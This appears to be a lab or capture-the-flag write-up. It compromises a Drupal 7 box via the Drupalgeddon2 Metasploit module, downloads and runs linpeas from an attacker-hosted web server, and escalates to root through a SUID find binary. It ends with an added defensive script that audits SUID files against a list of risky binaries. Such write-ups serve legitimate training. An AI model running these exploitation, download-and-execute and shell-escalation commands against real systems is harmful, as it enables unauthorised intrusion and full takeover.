RATING
Easy
ENUMERATION
We kick it off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.210.193

SSH and RPC won’t help us here, so we navigate to the target in our browser and discover Drupal CMS running.

Since we do not have any login credentials, we scan the site using droopescan:
Command: droopescan scan -u http://192.168.210.193

EXPLOITATION
The scan suggests the site is running some 7.x version of Drupal, so we use searchsploit to see what exploits are available.
The results show that the Drupalgeddon2 exploit is built into Metasploit:
Command: searchsploit drupal 7.x

We launch Metasploit and run this module to gain our initial shell as user www-data:
Command: use exploit/unix/webapp/drupal_drupalgeddon2
Command: set lhost 192.168.45.235
Command: set rhosts 192.168.210.193
Command: run
Command: shell
Command: /bin/bash -i

PRIVILEGE ESCALATION
After transferring linpeas over to the target, we execute it and discover that the find binary has the SUID bit set:
Command: python3 -m http.server 80 (on attacker machine)
Command: wget http://192.168.45.235/linpeas.sh (on target machine)
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

Heading over to GTFOBins, we see that we can use the find binary to escalate our shell to root.

As simple as that, we have a root shell and can retrieve our flag:
Command: find . -exec /bin/sh \; -quit
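
From the defender's side, the SUID bit on find is something to audit for and remove. The script below is an added example, not part of the original walkthrough; the RISKY name list is a short hand-picked sample rather than the full GTFOBins catalogue, and the function names are our own.

```shell
#!/bin/sh
# Added example: audit a directory tree for SUID files and flag the ones
# that can run other programs, such as the SUID find seen on this box.
# RISKY is a constructed sample list, not a complete catalogue.
RISKY="find bash dash env vim python perl cp nmap"

# audit_suid ROOT: print "FLAG <path>" for SUID files whose name is in
# RISKY and "ok   <path>" for every other SUID file under ROOT.
audit_suid() {
    root=${1:-/}
    # -xdev stays on one filesystem; -perm -4000 matches the SUID bit.
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        verdict="ok  "
        for r in $RISKY; do
            case "$name" in
                # Exact name, or name plus version suffix (python3, python2.7).
                "$r"|"$r"[0-9]*) verdict="FLAG" ;;
            esac
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# count_flagged ROOT: number of flagged SUID files under ROOT.
count_flagged() {
    audit_suid "$1" | grep -c '^FLAG' || true   # grep -c exits 1 on zero hits
}

# clear_suid PATH...: remove the SUID bit from the given files.
clear_suid() {
    chmod u-s -- "$@"
}

# Stand-alone use: sh audit.sh /usr/bin
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Matching is by file name only, so a renamed or copied binary is reported as "ok"; treat every SUID file outside the distribution's expected set as worth a look.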
